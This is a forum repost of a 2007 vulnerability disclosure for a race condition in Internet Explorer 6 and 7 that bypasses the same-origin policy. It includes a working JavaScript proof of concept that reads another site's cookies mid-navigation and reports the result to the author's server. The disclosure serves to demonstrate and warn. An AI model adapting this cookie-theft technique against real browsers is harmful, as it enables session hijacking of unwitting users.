逆水寒 2007-6-12 21:48
MSIE bait & switch vulnerability demo
There is a funny vulnerability in Microsoft Internet Explorer versions 6 and 7.
In short, when Javascript code instructs MSIE to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page, for example: read or set victim.document.cookie, arbitrarily alter document DOM, including changing form submission URLs, injecting code, or even crashing the browser due to memory corruption while reading and writing not fully initialized data structures.
In other words, the entire security model of the browser collapses like a house of cards and renders you vulnerable to a plethora of nasty attacks; and local system compromise is not out of question, either.
The following harmless demo will attempt to snatch a coookie from google.pl and display it for you. It is somewhat dependent on network timing and similar factors, and you obviously need Javascript to proceed, and you need to accept Google cookies. Tested on most recent MSIE 6 & 7, as of this writing that is (June 3, 2007). No, Firefox is not vulnerable. No, I have no clue about Opera, Safari, Konqueror and whatnot.
测试代码如下:
Copy code
<script>
var nw;
var i1, i2, i3, fail;
function foobar() {
nw = open("http://lcamtuf.coredump.cx/ierace/nothing.html","victim");
i1 = setInterval('winchecker()',1);
i2 = setInterval("try { nw.location.href = 'http://www.google.pl/'; } catch (e) {} ",500);
i3 = setInterval("try { nw.location.href = 'http://lcamtuf.coredump.cx/ierace/nothing.html'; } catch (e) {} ",601);
fail = setTimeout("failure()",120 * 1000);
}
function winchecker() {
try {
x = nw.document.cookie;
if (x) {
alert("Your google.pl cookie:\n\n" + x + "\n\nTest successful. Your browser is vulnerable.");
nw.close();
clearInterval(i1);
clearInterval(i2);
clearInterval(i3);
clearTimeout(fail);
x = new XMLHttpRequest();
x.open("GET","http://lcamtuf.coredump.cx/ierace/log.cgi?success", false);
x.send(null);
}
} catch (e) {}
}
function failure() {
clearInterval(i1);
clearInterval(i2);
clearInterval(i3);
nw.close();
alert("Failed to obtain cookie in 120 seconds.\n\n" +
"Your browser might be not vulnerable, or your\n" +
"network performance deviates from what this\n" +
"script expects. Try again or give up.\n");
x = new XMLHttpRequest();
x.open("GET","http://lcamtuf.coredump.cx/ierace/log.cgi?failure", false);
x.send(null);
}
</script>